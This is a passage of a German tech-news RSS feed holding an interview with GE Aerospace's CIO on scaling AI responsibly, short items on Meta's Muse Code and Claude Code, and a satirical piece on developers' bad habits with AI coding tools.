<p class="wp-block-paragraph">At the same time, our knowledge and familiarity with the landscape has allowed us to make connections with tech companies, including one where we’re using agentic AI in a multi-year partnership to predict demand and identify constraints to enhance production readiness in the Defense business.</p>



<p class="wp-block-paragraph">We were fortunate to have leaders who were very smart to invest in data scientists 10, 15 years ago, and we’re getting to leverage that talent today. The lesson there is that is you always have to be thinking long term when you’re talking about talent, because you may not know exactly how the world will play out, but making sure you have the best athletes on the field to run the race becomes critically important. For us, some of those investments we did around our people is what’s paying off today.</p>



<p class="wp-block-paragraph"><strong>One of the biggest challenges facing CIOs today is balancing innovation with risk management. How do you approach that balance in an industry where safety, reliability, and trust are non-negotiable?</strong></p>



<p class="wp-block-paragraph">It’s all about risk tolerance. There are certain areas in our business where we don’t have high risk tolerance, and we’re very methodical and cautious about how we deploy technology into those uses and have very stringent processes that we comply consistently with. In areas that are not safety and quality critical, we are more aggressive in looking at how we can use technology to deliver more for our customers and to make our employees more effective. That’s where we strike the balance, and at the end of the day, it’s about making sure we’re never compromising safety or quality in what we do.</p>



<p class="wp-block-paragraph">As for the process, we start with Flight Deck and focus AI where it can help solve critical challenges for our customers and with the highest impact to customer outcomes, enhancing safety, quality, delivery, and cost, in that order, to solve problems that matter most and keep fleets flying. ​</p>



<p class="wp-block-paragraph">We have three guiding principles for safe and responsible AI use: </p>



<ul class="wp-block-list">
<li><strong>Trust:</strong> The data-informing AI must be known, trusted, and reliable. </li>



<li><strong>Transparent:</strong> The AI must be transparent and repeatable, which means we need to know what is informing an AI model’s insights and actions.</li>



<li><strong>Human:</strong> A human must always be in the loop and make the final decision.    </li>
</ul>



<p class="wp-block-paragraph">Our culture of discipline also plays an important role. Our business variation is challenging, so one of the core fundamentals of Flight Deck is standard work. It’s embedded into our culture, and it’s the base expectation that we operate with standards that we’re continuously improving.</p>



<p class="wp-block-paragraph"><strong>Many organizations are struggling to move from AI pilots to enterprise-scale value. What lessons have you learned about successfully scaling AI across a large, complex organization?</strong></p>



<p class="wp-block-paragraph">AI is a tool that strengthens the capabilities of skilled employees; it is not a substitute for their judgment, experience, or accountability. So we focus on testing and validating AI solutions through pilots before scaling, and look for AI applications that meaningfully change how work gets done.</p>



<p class="wp-block-paragraph">Early on, when we started doing a lot of our generative AI work, we focused on 14 big problems in the business, and we didn’t let ourselves stray all over the place. We also didn’t look at it as a technology solution. We looked at the process and where technology played into the process, and then we embedded AI into those core processes. So now, it’s not a separate thing where you go do AI. It’s embedded in the workflow of how things get done.</p>



<p class="wp-block-paragraph">That gave us a foundation to learn and grow from that we’ve now applied. We’re not trying to create popcorn AI solutions all over the place. We’re trying to transform our business processes. In some cases, we’re doing good old process improvement, lean process improvement, eliminating waste, not necessarily a technology play. In other places, we’re applying technology that’s helping to lift us up and accelerate value by embedding it into the way work gets done, with a little bit of burning the boats behind you. You’re not able to do it the old way. You’ve got to use the tools. You’ve got to use the technology, because it’s the best-known way of doing it. The technology becomes part of the standard work.</p>



<p class="wp-block-paragraph">That’s why one of the biggest lessons in scaling AI is that success starts with the core fundamentals and understanding the problem you’re trying to solve. It’s critical to test and validate AI solutions before they are deployed at scale to ensure they improve how work gets done and become embedded in our workflows. If you do not have strong standard work and transparent and reliable data in place, it becomes difficult to move beyond pilot stage and create repeatable value at scale.</p>



<p class="wp-block-paragraph"><strong>Every day brings a new AI announcement, new model, or new prediction about the future. How do you separate what is truly meaningful from what is simply noise, and what advice would you give other leaders trying to do the same?</strong></p>



<p class="wp-block-paragraph">First and foremost is starting with the problem being solved, not the solution. If you’ve got a hammer that you want to use, everything starts looking like a nail. The most effective use of AI begins with an understanding of the problem that needs to be solved, then determining whether AI is the right tool to address it.</p>



<p class="wp-block-paragraph">As far as dealing with distractions, and there are a lot of them right now, it’s important to try a lot of things, but very quickly, and then make decisions on which are the bets you want to make and spend more time and more money on and which are the ones you want to pivot away from. We spend a lot of time doing quick experiments with technology and then having the courage to stop something when it’s not working.</p>



<p class="wp-block-paragraph"><strong>What excites you most about the future intersection of AI, engineering, manufacturing, and aerospace? And what should CIOs be doing today to prepare for that future?</strong></p>



<p class="wp-block-paragraph">Across aviation, AI is already helping to enhance safety, support more efficient operations, strengthen the resilience of global fleets, and improve the overall passenger experience. That includes GE Aerospace. These benefits come from investing not only in technology, but also in people, capacity, and trusted partnerships. </p>



<p class="wp-block-paragraph">They also depend on building mature, fully connected data threads through manufacturing and services that will drive higher value across our operations. The challenge will be ensuring that we enable this data thread across our operations to support AI solutions that will be developed and deployed.</p>



<p class="wp-block-paragraph">The most important thing is to understand that the role of digital technology and information technology is fundamentally going to change. When I came out of university, the only people that knew how to do software coding were computer scientists or information systems majors. We used to frown upon shadow IT, but the reality is, now everyone coming out of college knows how to do some level of software development, and AI tools are only going to make that easier.</p>



<p class="wp-block-paragraph">What CIOs need to start doing today is prepare for the future. The big questions they need to answer: How are they going to make sure they’ve got the platforms and the data set up in a way to serve a workforce that is capable of doing true citizen development, able to develop their own applications, their own solutions? How do you govern that from a data perspective, from a data privacy perspective, from a cybersecurity perspective, while not stifling but enabling the innovation of all those smart people that we’re hiring?</p>



<p class="wp-block-paragraph"><em>While many organizations search for shortcuts to AI success, GE Aerospace’s disciplined investment in data, analytics, talent, and operational excellence sets the company apart. Burns’ experience offers a clear lesson for CIOs: Creating the greatest value from AI requires building the capabilities, culture, and foundations that allow AI to amplify what the organization already does exceptionally well. For more from his leadership playbook, </em><a href="https://linktr.ee/techwhisperers"><em>tune in to the Tech Whisperers</em></a><em>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI takes flight at GE Aerospace]]></title>
<description><![CDATA[The race to adopt AI has left many CIOs wrestling with a fundamental question: How do you move faster without introducing unacceptable risk?



Few leaders face that challenge at a higher level than David Burns, CIO of GE Aerospace. Building on the company’s decade of experience applying AI acros...]]></description>
<link>https://tsecurity.de/de/3707631/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707631/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 12:50:21 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The race to adopt AI has left many CIOs wrestling with a fundamental question: How do you move faster without introducing unacceptable risk?</p>



<p class="wp-block-paragraph">Few leaders face that challenge at a higher level than David Burns, CIO of GE Aerospace. Building on the company’s decade of experience applying AI across its business, Burns is helping lead the next phase of the company’s digital transformation by leveraging AI to simplify and automate processes. Burns’ experience shows how AI can accelerate innovation, improve decision-making, and create value for the business and customers while maintaining the trust, safety, and operational rigor expected in the aerospace industry.</p>



<p class="wp-block-paragraph">In a recent episode of <a href="https://linktr.ee/techwhisperers">the Tech Whisperers podcast</a>, Burns opened up his playbook for leading organizations through turbulence. In this conversation, edited for length and clarity, he shares more practical lessons for technology leaders who are seeking to move beyond experimentation and scale AI responsibly across the enterprise.</p>



<p class="wp-block-paragraph"><strong>Dan Roberts: You’ve described AI as an accelerator. What exactly is AI accelerating inside GE Aerospace?</strong></p>



<p class="wp-block-paragraph"><strong>David Burns:</strong> At GE Aerospace, AI is used across our operations as an accelerator to Flight Deck, our proprietary lean operating model, and is applied to all key aspects of the business — design, manufacture, sales, and services. We identify and solve problems with Flight Deck and use AI to accelerate our problem-solving in ways we can genuinely feel, enabling us to identify issues earlier, solve problems faster for our customers, and improve how work gets done.</p>



<p class="wp-block-paragraph">For example, we are also using AI in:</p>



<p class="wp-block-paragraph"><strong>Design:</strong> While traditional processes for developing engine design concepts take months of manual work, the GE Aerospace Research Center built a proprietary generative AI application capable of producing hundreds of design concepts. As a result, the team produced the hypersonic ramjet engine design concept that met all regulatory requirements more than 90% faster than before, highlighting how AI is possible in engine design to support engineers bringing new technologies to market faster.</p>



<p class="wp-block-paragraph"><strong>Manufacture:</strong> Our team in Indianapolis used an AI coding assistant to automate a part quality inspection workflow, reducing 8 hours of manual measurement data entry for complex parts to just 3 seconds while improving data accuracy and inspection consistency. This has improved both the quality and efficiency for clearing parts to build, which helps drive on-time engine deliveries.</p>



<p class="wp-block-paragraph"><strong>Sales:</strong> Based on customer feedback that GE Aerospace’s responses for proposals needed to be faster, the sales team utilized a generative AI tool to synthesize data and produce deal proposals. The tool improved customer response time by more than two weeks for the GEnx team through reduced proposal development cycle time and standardized creation of more comprehensive deal proposals.</p>



<p class="wp-block-paragraph"><strong>Service:</strong> When LEAP engine rebuilds faced potential turnaround time (TAT) challenges due to material availability at our Maintenance, Repair and Overhaul (MRO) sites, our team in Lafayette, Indiana, applied AI to help reduce delays for customers. Using Daily &amp; Visual Management, they surfaced material flow challenges and their underlying drivers, leading to a new AI solution that leverages data to predict when and where parts are needed faster to reduce delays for our customers with an approximately six-day turnaround time improvement, 16% increase in on-time material orders, and 15% increase in on-time material delivery.</p>



<p class="wp-block-paragraph">Ultimately, by leveraging AI, Flight Deck helps us eliminate waste and identify and accelerate the most value-added steps for our customers, be it designing a part faster or responding to a customer request faster. And I would underscore that it’s value through the eyes of our customer. How we define value is not what we internally say; it’s how our customers define value, and how we’re working to be more customer-driven.</p>



<p class="wp-block-paragraph"><strong>GE Aerospace has been investing in analytics, machine learning, and digital capabilities for more than a decade. What advantages does that foundation create as you move into the generative AI era?</strong></p>



<p class="wp-block-paragraph">We’ve built one of the largest AI patent portfolios in the aviation industry through years of investment and supercomputing through digital technologies, and we continue to do work on our core transactional systems and our data foundations, so that way our data is AI-ready. This has allowed us to build our own AI capabilities and strong talent base. For example, the generative AI app we built to create new propulsion systems design was built in house by GE Aerospace scientists at the <a href="https://www.geaerospace.com/news/press-releases/ge-aerospace-completes-design-studies-hypersonic-ramjet-generative-ai">GE Aerospace Research Center</a>.</p>



<p class="wp-block-paragraph">At the same time, our knowledge and familiarity with the landscape has allowed us to make connections with tech companies, including one where we’re using agentic AI in a multi-year partnership to predict demand and identify constraints to enhance production readiness in the Defense business.</p>



<p class="wp-block-paragraph">We were fortunate to have leaders who were very smart to invest in data scientists 10, 15 years ago, and we’re getting to leverage that talent today. The lesson there is that is you always have to be thinking long term when you’re talking about talent, because you may not know exactly how the world will play out, but making sure you have the best athletes on the field to run the race becomes critically important. For us, some of those investments we did around our people is what’s paying off today.</p>



<p class="wp-block-paragraph"><strong>One of the biggest challenges facing CIOs today is balancing innovation with risk management. How do you approach that balance in an industry where safety, reliability, and trust are non-negotiable?</strong></p>



<p class="wp-block-paragraph">It’s all about risk tolerance. There are certain areas in our business where we don’t have high risk tolerance, and we’re very methodical and cautious about how we deploy technology into those uses and have very stringent processes that we comply consistently with. In areas that are not safety and quality critical, we are more aggressive in looking at how we can use technology to deliver more for our customers and to make our employees more effective. That’s where we strike the balance, and at the end of the day, it’s about making sure we’re never compromising safety or quality in what we do.</p>



<p class="wp-block-paragraph">As for the process, we start with Flight Deck and focus AI where it can help solve critical challenges for our customers and with the highest impact to customer outcomes, enhancing safety, quality, delivery, and cost, in that order, to solve problems that matter most and keep fleets flying. ​</p>



<p class="wp-block-paragraph">We have three guiding principles for safe and responsible AI use: </p>



<ul class="wp-block-list">
<li><strong>Trust:</strong> The data-informing AI must be known, trusted, and reliable. </li>



<li><strong>Transparent:</strong> The AI must be transparent and repeatable, which means we need to know what is informing an AI model’s insights and actions.</li>



<li><strong>Human:</strong> A human must always be in the loop and make the final decision.    </li>
</ul>



<p class="wp-block-paragraph">Our culture of discipline also plays an important role. Our business variation is challenging, so one of the core fundamentals of Flight Deck is standard work. It’s embedded into our culture, and it’s the base expectation that we operate with standards that we’re continuously improving.</p>



<p class="wp-block-paragraph"><strong>Many organizations are struggling to move from AI pilots to enterprise-scale value. What lessons have you learned about successfully scaling AI across a large, complex organization?</strong></p>



<p class="wp-block-paragraph">AI is a tool that strengthens the capabilities of skilled employees; it is not a substitute for their judgment, experience, or accountability. So we focus on testing and validating AI solutions through pilots before scaling, and look for AI applications that meaningfully change how work gets done.</p>



<p class="wp-block-paragraph">Early on, when we started doing a lot of our generative AI work, we focused on 14 big problems in the business, and we didn’t let ourselves stray all over the place. We also didn’t look at it as a technology solution. We looked at the process and where technology played into the process, and then we embedded AI into those core processes. So now, it’s not a separate thing where you go do AI. It’s embedded in the workflow of how things get done.</p>



<p class="wp-block-paragraph">That gave us a foundation to learn and grow from that we’ve now applied. We’re not trying to create popcorn AI solutions all over the place. We’re trying to transform our business processes. In some cases, we’re doing good old process improvement, lean process improvement, eliminating waste, not necessarily a technology play. In other places, we’re applying technology that’s helping to lift us up and accelerate value by embedding it into the way work gets done, with a little bit of burning the boats behind you. You’re not able to do it the old way. You’ve got to use the tools. You’ve got to use the technology, because it’s the best-known way of doing it. The technology becomes part of the standard work.</p>



<p class="wp-block-paragraph">That’s why one of the biggest lessons in scaling AI is that success starts with the core fundamentals and understanding the problem you’re trying to solve. It’s critical to test and validate AI solutions before they are deployed at scale to ensure they improve how work gets done and become embedded in our workflows. If you do not have strong standard work and transparent and reliable data in place, it becomes difficult to move beyond pilot stage and create repeatable value at scale.</p>



<p class="wp-block-paragraph"><strong>Every day brings a new AI announcement, new model, or new prediction about the future. How do you separate what is truly meaningful from what is simply noise, and what advice would you give other leaders trying to do the same?</strong></p>



<p class="wp-block-paragraph">First and foremost is starting with the problem being solved, not the solution. If you’ve got a hammer that you want to use, everything starts looking like a nail. The most effective use of AI begins with an understanding of the problem that needs to be solved, then determining whether AI is the right tool to address it.</p>



<p class="wp-block-paragraph">As far as dealing with distractions, and there are a lot of them right now, it’s important to try a lot of things, but very quickly, and then make decisions on which are the bets you want to make and spend more time and more money on and which are the ones you want to pivot away from. We spend a lot of time doing quick experiments with technology and then having the courage to stop something when it’s not working.</p>



<p class="wp-block-paragraph"><strong>What excites you most about the future intersection of AI, engineering, manufacturing, and aerospace? And what should CIOs be doing today to prepare for that future?</strong></p>



<p class="wp-block-paragraph">Across aviation, AI is already helping to enhance safety, support more efficient operations, strengthen the resilience of global fleets, and improve the overall passenger experience. That includes GE Aerospace. These benefits come from investing not only in technology, but also in people, capacity, and trusted partnerships. </p>



<p class="wp-block-paragraph">They also depend on building mature, fully connected data threads through manufacturing and services that will drive higher value across our operations. The challenge will be ensuring that we enable this data thread across our operations to support AI solutions that will be developed and deployed.</p>



<p class="wp-block-paragraph">The most important thing is to understand that the role of digital technology and information technology is fundamentally going to change. When I came out of university, the only people that knew how to do software coding were computer scientists or information systems majors. We used to frown upon shadow IT, but the reality is, now everyone coming out of college knows how to do some level of software development, and AI tools are only going to make that easier.</p>



<p class="wp-block-paragraph">What CIOs need to start doing today is prepare for the future. The big questions they need to answer: How are they going to make sure they’ve got the platforms and the data set up in a way to serve a workforce that is capable of doing true citizen development, able to develop their own applications, their own solutions? How do you govern that from a data perspective, from a data privacy perspective, from a cybersecurity perspective, while not stifling but enabling the innovation of all those smart people that we’re hiring?</p>



<p class="wp-block-paragraph"><em>While many organizations search for shortcuts to AI success, GE Aerospace’s disciplined investment in data, analytics, talent, and operational excellence sets the company apart. Burns’ experience offers a clear lesson for CIOs: Creating the greatest value from AI requires building the capabilities, culture, and foundations that allow AI to amplify what the organization already does exceptionally well. For more from his leadership playbook, </em><a href="https://linktr.ee/techwhisperers"><em>tune in to the Tech Whisperers</em></a><em>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta veröffentlicht Muse Code: Was der KI-Agent für Programmierer leisten kann]]></title>
<description><![CDATA[Meta zieht im KI-Rennen der Konkurrenz nach und veröffentlicht mit Muse Code einen eigenen KI-Coding-Agenten. Was das Programm so besonders macht und welche Kosten durch die Nutzung von Muse Code entstehen.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3707523/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707523/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 12:49:10 +0200</pubDate>
<content:encoded><![CDATA[Meta zieht im KI-Rennen der Konkurrenz nach und veröffentlicht mit Muse Code einen eigenen KI-Coding-Agenten. Was das Programm so besonders macht und welche Kosten durch die Nutzung von Muse Code entstehen.
<a href="https://t3n.de/news/meta-muse-code-1756709/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding mit Claude Code: Wie du dein eigenes Team-Tool baust]]></title>
<description><![CDATA[Ein Dashboard entwerfen, Funktionen ergänzen und per Link mit dem Team teilen: So legst du mit Claude Code los, ganz ohne Programmierkenntnisse.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3707526/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707526/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 12:49:10 +0200</pubDate>
<content:encoded><![CDATA[Ein Dashboard entwerfen, Funktionen ergänzen und per Link mit dem Team teilen: So legst du mit Claude Code los, ganz ohne Programmierkenntnisse.<a href="https://t3n.de/news/vibe-coding-mit-claude-code-wie-du-dein-eigenes-team-tool-baust-1756617/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Muse Code: Metas Antwort auf Coding-Agenten von OpenAI und Anthropic]]></title>
<description><![CDATA[Metas neuer Programmieragent Muse Code nutzt parallele Hintergrundagenten und das Sprachmodell Muse Spark 1.2 zu vergleichsweise günstigen Preisen.]]></description>
<link>https://tsecurity.de/de/3707459/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707459/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 12:48:50 +0200</pubDate>
<content:encoded><![CDATA[Metas neuer Programmieragent Muse Code nutzt parallele Hintergrundagenten und das Sprachmodell Muse Spark 1.2 zu vergleichsweise günstigen Preisen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Entwickler sich mit KI versündigen]]></title>
<description><![CDATA[>Im nächtlichen Schein der IDE suhlt sich mancher Dev im KI-Sündenpfuhl.Kateryna Reka | shutterstock.com



Die Normen der Softwareentwicklung sind weiterhin gültig. Zumindest offiziell sind robuste CI/CD-Pipelines, elegante Architekturmuster und wartbarer Code nach wie vor gesetzt.



Wenn wir u...]]></description>
<link>https://tsecurity.de/de/3707283/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707283/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 06:23:33 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Im nächtlichen Schein der IDE suhlt sich mancher Dev im KI-Sündenpfuhl.</figcaption></figure><p class="imageCredit">Kateryna Reka | shutterstock.com</p></div>



<p class="wp-block-paragraph">Die Normen der <a href="https://www.computerwoche.de/article/3963767/die-grosten-paradoxa-der-softwareentwicklung.html" target="_blank">Softwareentwicklung</a> sind weiterhin gültig. Zumindest offiziell sind robuste CI/CD-Pipelines, elegante Architekturmuster und wartbarer Code nach wie vor gesetzt.</p>



<p class="wp-block-paragraph">Wenn wir unbeobachtet sind, zeigt sich dann in vielen Fällen die Realität: Wir hängen wie entrückte Magier mit manischem Glanz in den Augen über unseren Konsolen und beschwören Modelle und Agenten, um uns voll und ganz dem KI-Rausch hinzugeben.</p>



<p class="wp-block-paragraph">Dabei begehen wir nicht selten Development-Sünden, die <a href="https://de.wikipedia.org/wiki/Frederick_P._Brooks" target="_blank" rel="noreferrer noopener">Fred Brooks</a> die Schamesröte ins Gesicht getrieben hätten. So wie die folgenden sieben. Vorsicht, Ironie – stellenweise.</p>



<h2 class="wp-block-heading">1. Grundlagenwissen für überflüssig halten</h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2829721/objektorientierte-programmierung-erklaert.html" target="_blank">Objektorientierte</a> oder <a href="https://www.infoworld.com/article/2263963/what-is-functional-programming-a-practical-guide.html" target="_blank">funktionale Programmierung</a>? <a href="https://de.wikipedia.org/wiki/CAP-Theorem" target="_blank" rel="noreferrer noopener">CAP-Theorem</a>? <a href="https://de.wikipedia.org/wiki/Don%E2%80%99t_repeat_yourself" target="_blank" rel="noreferrer noopener">DRY</a>-Prinzip? Design-Pattern? Können Sie vergessen. Ebenso Frameworks, Runtimes und Deployment-Plattformen.</p>



<p class="wp-block-paragraph">Die KI weiß schließlich ganz genau, was bereits vorhanden ist und welche Tools zu nutzen sind. So haben wir als Entwickler auch mehr mentale Bandbreite, um uns Nebenprojekten zu widmen. Zum Beispiel einem Roman über die KI-Weltherrschaft.</p>



<h2 class="wp-block-heading">2. Dokumentationen links liegen lassen</h2>



<p class="wp-block-paragraph">„<a href="https://de.wikipedia.org/wiki/RTFM" target="_blank" rel="noreferrer noopener">RTFM</a>“ nutzen viele Developer auch heutzutage noch gerne – auch wenn sie selbst eigentlich seit 2023 keine einzige Seite einer Anbieter-Dokumentation mehr gelesen haben. Löst ein Package eine bizarre Exception aus, wird weder der Execution-Pfad überprüft noch erfolgt ein Blick in die Release Notes. Stattdessen werden alle 200 Zeilen des Stack-Trace kopiert und in eine KI geworfen – in der Erwartung, dass diese uns dann löffelweise mit der Lösung füttert.</p>



<p class="wp-block-paragraph">Oder es wird direkt eine <a href="https://www.cowo.de/a/4199997" target="_blank" rel="noreferrer noopener">ADE</a> auf den Fehler angesetzt. Die findet den Fehler und fragt uns dann nur noch, ob die Lösung so korrekt ist. Manche werfen dann eventuell einen Blick auf die Beschreibung dieser Lösung – insofern sie die KI nicht vorher schon auf „Auto-Confirm“ umgestellt haben.</p>



<p class="wp-block-paragraph">So werden wir zu glorifizierten Copy-Paste-Orchestratoren – die einfach nur darauf hoffen, dass der stochastische Papagei hinter dem Prompt die Syntax richtig errät.</p>



<h2 class="wp-block-heading">3. Backend-Struktur ignorieren</h2>



<p class="wp-block-paragraph">KI-berauschte Devs geben manchmal vor, Datenflüsse akribisch designt, relationale Einschränkungen sorgfältig ausgearbeitet und <a href="https://www.computerwoche.de/article/4004872/die-besten-apis-um-ki-zu-integrieren.html" target="_blank">API</a>-Beziehungsgeflechte gewissenhaft abgebildet zu haben. Auch wenn wir eigentlich nur die KI angewiesen haben, ein modernes Deployment-Gerüst zu bauen und dieses mit einer Backend-<a href="https://www.computerwoche.de/article/3497295/datenbank-how-to-fur-app-entwickler.html" target="_blank">Datenbank</a> zu verknüpfen.   </p>



<p class="wp-block-paragraph">Dabei wurden Security-Regeln und Schemata erstellt, die wir unter Umständen nicht vollständig verstehen. Aber solange es funktional aussieht, wird es schon gut gehen. Eventuell wurden auch Infrastructure-as-Code-Skripte generiert, die Cloud-Ressourcen bereitstellen. Sicher wird sich jemand anderes darum kümmern, dass das kein Loch ins Budget frisst. Wahrscheinlich, indem er die Metriken in einen anderen Chatbot einspeist.</p>



<p class="wp-block-paragraph">Ist aber auch egal, weil das Mittagessen wartet.</p>



<h2 class="wp-block-heading">4. Inzestuöses Testing fördern</h2>



<p class="wp-block-paragraph">Test-driven Development war immer schon ein schöner Traum, der – wenn man ihn lebt – in Dependency-Wildwuchs <a href="https://grugbrain.dev/#grug-on-testing" target="_blank" rel="noreferrer noopener">ausarten kann</a>. Es ist also eine super Sache, dass wir heutzutage mit KI fast mühelos eine Testabdeckung von 95 Prozent erreichen können. Warum sollten wir die Maschine das nicht direkt mit übernehmen lassen, wenn sie auch alles andere automatisiert erstellt?</p>



<p class="wp-block-paragraph">So kann man auch jedem der es wissen will (oder der gerade keine Fluchtmöglichkeit hat), das Narrativ von der erstaunlichen Testabdeckung unter die Nase reiben und sich in ausgiebigen Schwärmereien über die automatisierte Qualitätssicherung ergehen. Was dabei geflissentlich verschwiegen wird: Die komplexe Anwendungslogik und die Testsuite wurden von derselben KI generiert. Diese validiert also genau den Code, den sie zuvor zusammengeschustert hat.</p>



<p class="wp-block-paragraph">Daraus entsteht ein hermetisch abgeriegelter Kreislauf der algorithmischen Selbstbeweihräucherung: Die Mocks, Randfälle und Assertions werden zur Echokammer für die ursprünglichen Annahmen des KI-Modells. Die Maschine benotet also ihre eigenen Hausaufgaben und gibt sich dafür eine Eins mit Sternchen.</p>



<p class="wp-block-paragraph">Das wird von einigen von uns allerdings gerne in Kauf genommen, denn wenn der Code verändert werden muss, zaubert die KI auch dafür mühelos neue Tests aus dem Hut.</p>



<h2 class="wp-block-heading">5. KI-Ergebnisse als Strategie ausgeben</h2>



<p class="wp-block-paragraph">Dokumente zu designen, kann KI erstaunlich gut: Diese sind meist apart formatiert, wirken schlüssig und schlagen nahtlos die Brücke zwischen übergeordneten Geschäftszielen und detaillierten technischen Specs. Und: Sie enthalten auch die tollen Sequenz-Diagramme, die das Management so schätzt.</p>



<p class="wp-block-paragraph">Architekturvorschläge, die auf diese Art und Weise entstanden sind, werden regelmäßig in Sprint-Planungs-Meetings präsentiert – und kommen beim Rest des Teams oft gut an. Schließlich weiß auch niemand, dass in den hochgelobten Vorschlag ungefähr vier Sekunden „Mühe“ investiert wurden.</p>



<p class="wp-block-paragraph">Ignoriert wird dabei, dass solche KI-generierten Dokumente gleichermaßen anfällig für fatale Mängel in Bezug auf Scope und Alignment sind, wie von Menschenhand gemachte. Aber wenn das Projekt schon scheitert, war wenigstens das <a href="https://www.computerwoche.de/article/3995075/was-ist-markdown.html" target="_blank">Markdown</a> schön klar und die Bulletpoints echt überzeugend. Das wahre Ausmaß des folgenden Desasters wird zwar erst erkannt, wenn es schon viel zu spät ist – aber immerhin war der Ansatz visionär.</p>



<h2 class="wp-block-heading">6. Heimlich dem Vibe Coding verfallen</h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/4034385/9-wege-mit-vibe-coding-zu-scheitern.html" target="_blank">Vibe Coding</a> ist unter Devs in sozialen Kanälen regelmäßig eine Lachnummer. Und auch in Slack-Channels werden regelmäßige augenrollende Emojis verschickt, wenn es um das Thema geht. Nach außen möchten wir alle möglichst professionell wirken.</p>



<p class="wp-block-paragraph">Wenn niemand zusieht, wird dann unter Umständen aber doch der heimlichen Vibe-Coding-Leidenschaft gefröhnt: Unausgereifte Gedanken und ein Drink, sind alles was man braucht, um entspannt dabei zusehen zu können, wie die KI ihre “Coding-Magie” entfaltet.</p>



<p class="wp-block-paragraph">Daraus entsteht dann vielleicht endlich ein funktionierender <a href="https://de.wikipedia.org/wiki/Ultima_(Computerspielreihe)" target="_blank" rel="noreferrer noopener">Ultima-V</a>-Klon oder eine App, um Krypto-Protfolios zu tracken, die nach dem Interface aus „<a href="https://de.wikipedia.org/wiki/Neuromancer-Trilogie" target="_blank" rel="noreferrer noopener">Neuromancer</a>“ aussieht. Und zwar in 30 Sekunden. Das berauscht. Und kann süchtig machen. Leider ganz besonders, wenn man tief in der harten, altmodischen Realität des Programmierhandwerks verwurzelt ist.</p>



<h2 class="wp-block-heading">7. Prompts als Allheilmittel betrachten</h2>



<p class="wp-block-paragraph">Ahnlich wie die Figur von Adam Sandler in „<a href="https://www.imdb.com/de/title/tt5727208/" target="_blank" rel="noreferrer noopener">Der schwarze Diamant</a>“ sind manche Devs davon überzeugt, dass mit der nächsten Runde alles besser wird – nur bezogen auf Prompts. Wenn die Dinge aus dem Ruder laufen, bevorzugen diese regelmäßig, den KI-Prompt zu verfeinern – statt sich selbst dem Komplexitätsdickicht zu widmen.</p>



<p class="wp-block-paragraph">Der gleiche fehlerbehaftete Stack Trace wird dann unerbittlich immer und immer wieder in den Chat gehämmert, das Modell auf einen immer schmaleren Pfad gezwungen – solange, bis der Code endlich keine Fehler mehr ausgibt. Debugging und Variablen-Tracing sind so gut wie nicht mehr existent, Funktionen werden nicht mehr schrittweise geprüft. Stattdessen wird unermüdlich iterativer Druck auf die KI ausgeübt, bis diese kapituliert. Und dann geht’s ab in die Produktion.</p>



<p class="wp-block-paragraph">So fließt am Ende ähnlich viel Zeit und Energie in den Kampf mit dem Bot, wie früher in die manuelle Syntaxerstellung. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist </strong><a href="https://www.infoworld.com/article/4199668/seven-sins-of-the-modern-software-developer.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake-IT-Mitarbeiter: Wie CIOs den Betrug erkennen]]></title>
<description><![CDATA[Die Struktur des Betrugs ist arbeitsteilig. IT-Fachkräfte, Rekruter, Mittelsleute und lokale Helfer suchen gezielt Opfer und erschaffen die Illusion einer Persona.chingyunsong – shutterstock.com



Ein Freelance-Entwickler präsentiert sich mit tadellosem Lebenslauf, sauberem Portfolio und überzeu...]]></description>
<link>https://tsecurity.de/de/3707282/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707282/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 06:23:14 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


